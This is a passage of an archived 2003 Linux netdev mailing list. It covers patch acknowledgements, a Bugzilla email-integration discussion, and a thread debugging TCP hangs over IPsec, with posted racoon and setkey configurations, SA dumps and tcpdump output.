Applied, thanks. From davem@redhat.com Sat Jul 19 21:57:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 21:57:24 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K4vLFl017424 for ; Sat, 19 Jul 2003 21:57:21 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA31723; Sat, 19 Jul 2003 21:47:13 -0700 Date: Sat, 19 Jul 2003 21:47:12 -0700 From: "David S. Miller" To: Stephen Hemminger Cc: eis@baty.hanse.de, netdev@oss.sgi.com Subject: Re: [PATCH] Allow lapb to be unloaded. Message-Id: <20030719214712.3a0c9b0a.davem@redhat.com> In-Reply-To: <20030718150101.0558d04e.shemminger@osdl.org> References: <20030718133211.1c7ed08d.shemminger@osdl.org> <20030718150101.0558d04e.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4184 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 15:01:01 -0700 Stephen Hemminger wrote: > Without an exit routine lapb can't be unloaded. Applied, thanks. From davem@redhat.com Sat Jul 19 21:58:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 21:58:54 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K4wpFl017805 for ; Sat, 19 Jul 2003 21:58:51 -0700 Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id VAA31739; Sat, 19 Jul 2003 21:48:44 -0700 Date: Sat, 19 Jul 2003 21:48:43 -0700 From: "David S. 
Miller" To: Stephen Hemminger Cc: ncorbic@sangoma.com, netdev@oss.sgi.com Subject: Re: [PATCH] Eliminate MOD_ from wanrouter Message-Id: <20030719214843.0dbf5f3c.davem@redhat.com> In-Reply-To: <20030718133512.434b1e70.shemminger@osdl.org> References: <20030718133512.434b1e70.shemminger@osdl.org> X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4185 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev On Fri, 18 Jul 2003 13:35:12 -0700 Stephen Hemminger wrote: > Wan router register/unregister doesn't need MOD_INC/MOD_DEC because it > can't be unloaded as long as it's symbols are in use by the calling module. Applied, thanks. From jmorris@intercode.com.au Sat Jul 19 22:58:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Sat, 19 Jul 2003 22:58:46 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:sJBNgwjiY7rTz2hT3yM7ngZjZI5hzeVT@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K5waFl021050 for ; Sat, 19 Jul 2003 22:58:38 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6K5wDr11855; Sun, 20 Jul 2003 15:58:14 +1000 Date: Sun, 20 Jul 2003 15:58:13 +1000 (EST) From: James Morris To: Sean Neakums cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds In-Reply-To: <6uk7aeab33.fsf@zork.zork.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4186 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Sat, 19 Jul 2003, Sean Neakums wrote: > 
twenty. The problem seems unrelated to the amount of data > transferred; I've tried both bulk rsync transfers and ssh sessions. > I've also tested the same boxes over 100baseT; still happens. It sounds a bit like a pmtu problem related to the wireless bridge, but that would be dependent on amount of data transferred and should not happen on 100baseT. Transport mode (just blowfish encryption) looks to be working ok for me, I'm able to ftp uncompressed kernel tarballs between two boxes over gigabit ethernet with no apparent problems. - James -- James Morris From cedric.gavage@unixtech.be Sun Jul 20 01:45:38 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 01:45:47 -0700 (PDT) Received: from virtual.paginaweb.be (virtual.paginaweb.be [212.3.242.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6K8jaFl029633 for ; Sun, 20 Jul 2003 01:45:37 -0700 Received: from unixtech.be (193.170-136-217.adsl.skynet.be [217.136.170.193]) (authenticated bits=0) by virtual.paginaweb.be (8.12.9/8.12.9/UnixTech - Niddle v2.5 - abuse@unixtech.be) with ESMTP id h6K8jSPu024884; Sun, 20 Jul 2003 10:45:28 +0200 Message-ID: <3F1A566C.8070900@unixtech.be> Date: Sun, 20 Jul 2003 10:44:28 +0200 From: Cedric Gavage User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030714 Debian/1.3.1-3 StumbleUpon/1.73 X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: Alan Cox , netdev@oss.sgi.com Subject: Re: [Fwd: kernel 2.4.21] References: <1058634345.22000.2.camel@dhcp22.swansea.linux.org.uk> <20030719191723.0821227f.davem@redhat.com> In-Reply-To: <20030719191723.0821227f.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4187 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cedric.gavage@unixtech.be Precedence: bulk X-list: netdev David S. 
Miller wrote: > On 19 Jul 2003 18:05:45 +0100 > Alan Cox wrote: > > >>>Jul 17 06:31:00 fazer kernel: KERNEL: assertion (newsk->state != >>>TCP_SYN_RECV) failed at tcp.c(2229) > > > This one was fixed in 2.4.21 > Thanks for the information... I'll upgrade and test again... -- Cedric Gavage http://unixtech.be - http://gavage.com - OpenPGP: 0xED325C64 From sneakums@zork.net Sun Jul 20 05:29:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 05:29:42 -0700 (PDT) Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KCTWFl016674 for ; Sun, 20 Jul 2003 05:29:32 -0700 Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eDJd-0003V1-00; Sun, 20 Jul 2003 05:29:25 -0700 To: James Morris Cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds References: From: Sean Neakums Mail-Followup-To: James Morris , netdev@oss.sgi.com, In-Reply-To: (James Morris's message of "Sun, 20 Jul 2003 15:58:13 +1000 (EST)") Date: Sun, 20 Jul 2003 13:29:24 +0100 Message-ID: <6u8yqt8jq3.fsf@zork.zork.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 4188 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: sneakums@zork.net Precedence: bulk X-list: netdev James Morris writes: > On Sat, 19 Jul 2003, Sean Neakums wrote: > >> twenty. The problem seems unrelated to the amount of data >> transferred; I've tried both bulk rsync transfers and ssh sessions. >> I've also tested the same boxes over 100baseT; still happens. > > It sounds a bit like a pmtu problem related to the wireless bridge, but > that would be dependent on amount of data transferred and should not > happen on 100baseT. I am seeing a lot of "pmtu discvovery on SA AH/03537192/c0a80003" type messages (I forgot to check for them when on 100baseT; will recheck that). 
Are these indicative of such a problem? I seem to recall that reducing the max MTU is not as straightforward as just adjusting the interfaces' mtu setting. What should I do to eliminate pmtu as the source of the problem? > Transport mode (just blowfish encryption) looks to be working ok for me, > I'm able to ftp uncompressed kernel tarballs between two boxes over > gigabit ethernet with no apparent problems. I had been using 3des with AH; just retried with blowfish 448 and no AH with much the same result. From jmorris@intercode.com.au Sun Jul 20 08:21:36 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 08:21:46 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:8RmbbmJKfK3ai/r7MYhGLCWvjA/C2Vdw@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KFLXFl024869 for ; Sun, 20 Jul 2003 08:21:35 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h6KFLOr13471; Mon, 21 Jul 2003 01:21:25 +1000 Date: Mon, 21 Jul 2003 01:21:24 +1000 (EST) From: James Morris To: Sean Neakums cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds In-Reply-To: <6u8yqt8jq3.fsf@zork.zork.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4189 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Sun, 20 Jul 2003, Sean Neakums wrote: > I am seeing a lot of "pmtu discvovery on SA AH/03537192/c0a80003" type > messages (I forgot to check for them when on 100baseT; will recheck > that). Are these indicative of such a problem? Yes. With the 100baseT configuration, are the systems on the same segment? 
It might help to provide tcpdumps from each end, ifconfig output for each interface and setkey configuration (without the wlan bridging). - James -- James Morris From pasky@machine.sinus.cz Sun Jul 20 09:46:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 09:46:31 -0700 (PDT) Received: from machine.sinus.cz (pasky.ji.cz [213.226.226.138]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KGkEFl029041 for ; Sun, 20 Jul 2003 09:46:15 -0700 Received: (qmail 8974 invoked by uid 2001); 20 Jul 2003 16:46:09 -0000 Date: Sun, 20 Jul 2003 18:46:09 +0200 From: Petr Baudis To: "Martin J. Bligh" Cc: "David S. Miller" , alan@lxorguk.ukuu.org.uk, greearb@candelatech.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Re: networking bugs and bugme.osdl.org Message-ID: <20030720164609.GH12132@pasky.ji.cz> Mail-Followup-To: "Martin J. Bligh" , "David S. Miller" , alan@lxorguk.ukuu.org.uk, greearb@candelatech.com, linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com References: <20030629.151302.28804993.davem@redhat.com> <17280000.1056940541@[10.10.2.4]> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <17280000.1056940541@[10.10.2.4]> User-Agent: Mutt/1.4i X-message-flag: Outlook : A program to spread viri, but it can do mail too. X-archive-position: 4190 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pasky@ucw.cz Precedence: bulk X-list: netdev Dear diary, on Mon, Jun 30, 2003 at 04:35:44AM CEST, I got a letter, where "Martin J. Bligh" told me, that... > --"David S. Miller" wrote (on Sunday, June 29, 2003 15:13:02 -0700): ..snip.. > > The greatest tools in the world aren't useful if people don't want > > to use them. > > > > Nobody wants to use tools unless it melds easily into their existing > > daily routine. 
This means it must be email based and it must somehow > > work via the existing mailing lists. It sounds a lot like what I'm > > advocating except that there's some robot monitoring the list > > postings. > > Agreed, the interface could be better - we're working on it. It won't > be totally change free, but it could be better integrated. Feedback is > very useful, though it helps a lot of you can pinpoint what's the > underlying issue rather than "this is crap". Better email integration > is top of the list, starting with sending stuff out to multiple people > when filed, not a single bottleneck point. Actually, it's not difficult to make Bugzilla do things like sending out ALL bug update emails to certain email address(es), on a global basis or per-module. Also, it is relatively easy to make Bugzilla _accept_ bug updates through email, from additional comments (+ attachments) to status/priority/target/... changes. It works quite nicely for us (ELinks) and it took just a few hours to set up properly (we had to touch the BZ sources, but just a little, the rest are external support scripts). What is missing is some email interface for querying the database (shouldn't be difficult to do, though), but if you just want to file/update bugs, all you need is to: * have the new bugs posted on the mailing list * keep bugzilla in the cc list through the whole thread, as long as it's relevant at least ;-) * don't remove [Bug 12345] from the subject If Martin would like some know-how about how to set things up, I could share what we've done with him. Kind regards, -- Petr "Pasky" Baudis . Perfection is reached, not when there is no longer anything to add, but when there is no longer anything to take away. -- Antoine de Saint-Exupery . 
Stuff: http://pasky.ji.cz/ From sneakums@zork.net Sun Jul 20 12:23:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Sun, 20 Jul 2003 12:23:51 -0700 (PDT) Received: from zork.zork.net (mail@zork.zork.net [64.81.246.102]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6KJNRFl004973 for ; Sun, 20 Jul 2003 12:23:28 -0700 Received: from sneakums by zork.zork.net with local (Exim 3.35 #1 (Debian)) id 19eJm9-0003Sl-00; Sun, 20 Jul 2003 12:23:17 -0700 To: James Morris Cc: netdev@oss.sgi.com, Subject: Re: [2.6.0-test1-mm1] TCP connections over ipsec hang after a few seconds References: From: Sean Neakums Mail-Followup-To: James Morris , netdev@oss.sgi.com, Date: Sun, 20 Jul 2003 20:23:16 +0100 In-Reply-To: (James Morris's message of "Mon, 21 Jul 2003 01:21:24 +1000 (EST)") Message-ID: <6uwued6lzv.fsf@zork.zork.net> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-archive-position: 4191 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: sneakums@zork.net Precedence: bulk X-list: netdev James Morris writes: > On Sun, 20 Jul 2003, Sean Neakums wrote: > >> I am seeing a lot of "pmtu discvovery on SA AH/03537192/c0a80003" type >> messages (I forgot to check for them when on 100baseT; will recheck >> that). Are these indicative of such a problem? > > Yes. I still get these messages running over 100baseT. > With the 100baseT configuration, are the systems on the same segment? I'm connecting the two machines with a crossed-over cable. > It might help to provide tcpdumps from each end, ifconfig output for each > interface and setkey configuration (without the wlan bridging). Below is the config info. I'm running racoon. I ended up with about forty megabytes of tcpdump output on each side of the link before the hang occurred. I've appended below the last 150 lines of each dump. Four separate TCP connections were involved in all, for a total of about 400MiB of data transferred. 
--- First machine eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:113024 errors:0 dropped:0 overruns:0 frame:0 TX packets:361585 errors:0 dropped:0 overruns:0 carrier:0 collisions:97 txqueuelen:100 RX bytes:8468832 (8.0 MiB) TX bytes:531820915 (507.1 MiB) Interrupt:10 Base address:0xc400 Memory:dfffe000-dfffe038 --- #!/usr/sbin/setkey -f flush; spdflush; spdadd 192.168.0.1 192.168.0.3 any -P out ipsec esp/transport//require; spdadd 192.168.0.3 192.168.0.1 any -P in ipsec esp/transport//require; --- # $KAME: racoon.conf.in,v 1.18 2001/08/16 06:33:40 itojun Exp $ # "path" must be placed before it should be used. # You can overwrite which you defined, but it should not use due to confusing. path include "/etc/racoon" ; #include "remote.conf" ; # search this file for pre_shared_key with various ID key. path pre_shared_key "/etc/racoon/psk.txt" ; # racoon will look for certificate file in the directory, # if the certificate/certificate request payload is received. path certificate "/etc/cert" ; # "log" specifies logging level. It is followed by either "notify", "debug" # or "debug2". #log debug; # "padding" defines some parameter of padding. You should not touch these. padding { maximum_length 20; # maximum padding length. randomize off; # enable randomize length. strict_check off; # enable strict check. exclusive_tail off; # extract last one octet. } # if no listen directive is specified, racoon will listen to all # available interface addresses. listen { #isakmp ::1 [7000]; #isakmp 202.249.11.124 [500]; #admin [7002]; # administrative's port by kmpstat. #strict_address; # required all addresses must be bound. } # Specification of default various timer. timer { # These value can be changed per remote node. counter 5; # maximum trying count to send. interval 20 sec; # maximum interval to resend. persend 1; # the number of packets per a send. 
# timer for waiting to complete each phase. phase1 30 sec; phase2 15 sec; } remote anonymous { exchange_mode aggressive,main; doi ipsec_doi; situation identity_only; my_identifier address; lifetime time 2 min; # sec,min,hour initial_contact on; proposal_check obey; # obey, strict or claim proposal { encryption_algorithm blowfish 448; hash_algorithm sha1; authentication_method pre_shared_key ; dh_group 2 ; } } sainfo anonymous { pfs_group 1; lifetime time 2 min; encryption_algorithm blowfish 448; authentication_algorithm hmac_sha1; compression_algorithm deflate; } remote 192.168.0.3 { exchange_mode aggressive, main; my_identifier asn1dn; peers_identifier asn1dn; certificate_type x509 "tower.public" "tower.private"; peers_certfile "craptop.public"; proposal { encryption_algorithm blowfish 448; hash_algorithm sha1; authentication_method rsasig; dh_group 2; } } --- 192.168.0.3 192.168.0.1 esp mode=transport spi=186578041(0x0b1ef479) reqid=0(0x00000000) E: blowfish-cbc 6047c0a9 b1244f40 37937606 2246d408 f3de362c 31f21b89 4cab6800 abde86ff b002ae5a 08681d2a d55c99fa ad2a626d d1f3a064 15f898d1 A: hmac-sha1 a27c176b 40e0f619 c3a16111 72742867 acfc9b89 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 20 20:05:25 2003 current: Jul 20 20:06:58 2003 diff: 93(s) hard: 120(s) soft: 96(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 sadb_seq=1 pid=2052 refcnt=0 192.168.0.1 192.168.0.3 esp mode=transport spi=55613933(0x035099ed) reqid=0(0x00000000) E: blowfish-cbc d4ae888d 41f40471 9d51d800 bb52e89d a29e48ef 1f7e826f f16ac829 06e3fb74 e8731ee8 579b4f04 01e7e8a6 8f4d5ff0 cb57b801 e6cf4036 A: hmac-sha1 ca60673d bdab7f98 9b258c9e 6a6e6da3 8ff07b20 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 20 20:05:25 2003 current: Jul 20 20:06:58 2003 diff: 93(s) hard: 120(s) soft: 96(s) last: Jul 20 20:05:48 2003 hard: 0(s) soft: 0(s) current: 3008(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 2 
hard: 0 soft: 0 sadb_seq=0 pid=2052 refcnt=0 --- Second machine eth0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx inet addr:192.168.0.3 Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:313871 errors:0 dropped:0 overruns:0 frame:0 TX packets:83692 errors:0 dropped:0 overruns:0 carrier:1 collisions:0 txqueuelen:100 RX bytes:471974158 (450.1 MiB) TX bytes:7202706 (6.8 MiB) Interrupt:11 Base address:0xec80 --- #!/usr/sbin/setkey -f flush; spdflush; spdadd 192.168.0.3 192.168.0.1 any -P out ipsec esp/transport//require; spdadd 192.168.0.1 192.168.0.3 any -P in ipsec esp/transport//require; --- # $KAME: racoon.conf.in,v 1.18 2001/08/16 06:33:40 itojun Exp $ # "path" must be placed before it should be used. # You can overwrite which you defined, but it should not use due to confusing. path include "/etc/racoon" ; #include "remote.conf" ; # search this file for pre_shared_key with various ID key. path pre_shared_key "/etc/racoon/psk.txt" ; # racoon will look for certificate file in the directory, # if the certificate/certificate request payload is received. path certificate "/etc/cert" ; # "log" specifies logging level. It is followed by either "notify", "debug" # or "debug2". #log debug; # "padding" defines some parameter of padding. You should not touch these. padding { maximum_length 20; # maximum padding length. randomize off; # enable randomize length. strict_check off; # enable strict check. exclusive_tail off; # extract last one octet. } # if no listen directive is specified, racoon will listen to all # available interface addresses. listen { #isakmp ::1 [7000]; #isakmp 202.249.11.124 [500]; #admin [7002]; # administrative's port by kmpstat. #strict_address; # required all addresses must be bound. } # Specification of default various timer. timer { # These value can be changed per remote node. counter 5; # maximum trying count to send. interval 20 sec; # maximum interval to resend. 
persend 1; # the number of packets per a send. # timer for waiting to complete each phase. phase1 30 sec; phase2 15 sec; } remote anonymous { exchange_mode aggressive,main; doi ipsec_doi; situation identity_only; my_identifier address; lifetime time 2 min; # sec,min,hour initial_contact on; proposal_check obey; # obey, strict or claim proposal { encryption_algorithm blowfish 448; hash_algorithm sha1; authentication_method pre_shared_key ; dh_group 2 ; } } sainfo anonymous { pfs_group 1; lifetime time 2 min; encryption_algorithm blowfish 448; authentication_algorithm hmac_sha1; compression_algorithm deflate; } remote 192.168.0.1 { exchange_mode aggressive, main; my_identifier asn1dn; peers_identifier asn1dn; certificate_type x509 "craptop.public" "craptop.private"; peers_certfile "tower.public"; proposal { encryption_algorithm blowfish 448; hash_algorithm sha1; authentication_method rsasig; dh_group 2; } } --- 192.168.0.3 192.168.0.1 esp mode=transport spi=186578041(0x0b1ef479) reqid=0(0x00000000) E: blowfish-cbc 6047c0a9 b1244f40 37937606 2246d408 f3de362c 31f21b89 4cab6800 abde86ff b002ae5a 08681d2a d55c99fa ad2a626d d1f3a064 15f898d1 A: hmac-sha1 a27c176b 40e0f619 c3a16111 72742867 acfc9b89 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 20 19:56:39 2003 current: Jul 20 19:57:55 2003 diff: 76(s) hard: 120(s) soft: 96(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) soft: 0(bytes) allocated: 0 hard: 0 soft: 0 sadb_seq=1 pid=15668 refcnt=0 192.168.0.1 192.168.0.3 esp mode=transport spi=55613933(0x035099ed) reqid=0(0x00000000) E: blowfish-cbc d4ae888d 41f40471 9d51d800 bb52e89d a29e48ef 1f7e826f f16ac829 06e3fb74 e8731ee8 579b4f04 01e7e8a6 8f4d5ff0 cb57b801 e6cf4036 A: hmac-sha1 ca60673d bdab7f98 9b258c9e 6a6e6da3 8ff07b20 seq=0x00000000 replay=4 flags=0x00000000 state=mature created: Jul 20 19:56:39 2003 current: Jul 20 19:57:55 2003 diff: 76(s) hard: 120(s) soft: 96(s) last: hard: 0(s) soft: 0(s) current: 0(bytes) hard: 0(bytes) 
soft: 0(bytes) allocated: 0 hard: 0 soft: 0 sadb_seq=0 pid=15668 refcnt=0 --- last 150 lines of tcpdump on 192.168.0.1 20:04:11.901017 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11315) (DF) (ttl 64, id 34196, len 72) 20:04:11.901132 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11316) (DF) (ttl 64, id 34197, len 72) 20:04:11.901201 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa18) (DF) (ttl 64, id 5447, len 1496) 20:04:11.901381 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa19) (DF) (ttl 64, id 5448, len 1496) 20:04:11.901534 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1a) (DF) (ttl 64, id 5449, len 1496) 20:04:11.901684 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1b) (DF) (ttl 64, id 5450, len 1496) 20:04:11.901257 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11317) (DF) (ttl 64, id 34198, len 72) 20:04:11.901863 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1c) (DF) (ttl 64, id 5451, len 1496) 20:04:11.902013 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1d) (DF) (ttl 64, id 5452, len 1496) 20:04:11.902162 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1e) (DF) (ttl 64, id 5453, len 1496) 20:04:11.902312 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa1f) (DF) (ttl 64, id 5454, len 1496) 20:04:11.903145 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11318) (DF) (ttl 64, id 34199, len 72) 20:04:11.903327 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa20) (DF) (ttl 64, id 5455, len 1496) 20:04:11.903382 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x11319) (DF) (ttl 64, id 34200, len 72) 20:04:11.903476 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa21) (DF) (ttl 64, id 5456, len 1496) 20:04:11.903641 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa22) (DF) (ttl 64, id 5457, len 1496) 20:04:11.903790 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa23) (DF) (ttl 64, id 5458, len 1496) 20:04:11.903940 192.168.0.1 > 192.168.0.3: 
ESP(spi=0x0c1e03ec,seq=0x3fa24) (DF) (ttl 64, id 5459, len 1496) 20:04:11.904089 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa25) (DF) (ttl 64, id 5460, len 1496) 20:04:11.904237 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa26) (DF) (ttl 64, id 5461, len 1496) 20:04:11.904385 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa27) (DF) (ttl 64, id 5462, len 1496) 20:04:11.904567 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa28) (DF) (ttl 64, id 5463, len 1496) 20:04:11.905495 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131a) (DF) (ttl 64, id 34201, len 72) 20:04:11.905680 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa29) (DF) (ttl 64, id 5464, len 1496) 20:04:11.905749 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131b) (DF) (ttl 64, id 34202, len 72) 20:04:11.905835 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2a) (DF) (ttl 64, id 5465, len 1496) 20:04:11.905990 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2b) (DF) (ttl 64, id 5466, len 1496) 20:04:11.906130 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2c) (DF) (ttl 64, id 5467, len 1496) 20:04:11.906269 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2d) (DF) (ttl 64, id 5468, len 1496) 20:04:11.906408 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2e) (DF) (ttl 64, id 5469, len 1496) 20:04:11.907958 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131c) (DF) (ttl 64, id 34203, len 72) 20:04:11.908072 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131d) (DF) (ttl 64, id 34204, len 72) 20:04:11.908212 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa2f) (DF) (ttl 64, id 5470, len 1496) 20:04:11.908198 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131e) (DF) (ttl 64, id 34205, len 72) 20:04:11.908392 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa30) (DF) (ttl 64, id 5471, len 1496) 20:04:11.908547 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa31) (DF) (ttl 64, id 5472, len 
1496) 20:04:11.908690 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa32) (DF) (ttl 64, id 5473, len 1496) 20:04:11.908863 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa33) (DF) (ttl 64, id 5474, len 1496) 20:04:11.909028 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa34) (DF) (ttl 64, id 5475, len 1496) 20:04:11.909180 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa35) (DF) (ttl 64, id 5476, len 1496) 20:04:11.909332 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa36) (DF) (ttl 64, id 5477, len 1496) 20:04:11.908353 192.168.0.3 > 192.168.0.1: ESP(spi=0x06e9543a,seq=0x1131f) (DF) (ttl 64, id 34206, len 72) 20:04:11.909543 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa37) (DF) (ttl 64, id 5478, len 1496) 20:04:11.909691 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa38) (DF) (ttl 64, id 5479, len 1496) 20:04:11.909841 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa39) (DF) (ttl 64, id 5480, len 1496) 20:04:11.909992 192.168.0.1 > 192.168.0.3: ESP(spi=0x0c1e03ec,seq=0x3fa3a) (DF) (ttl 64, id 5481, len 1496) 20:04:11.910141 192.168.0.1 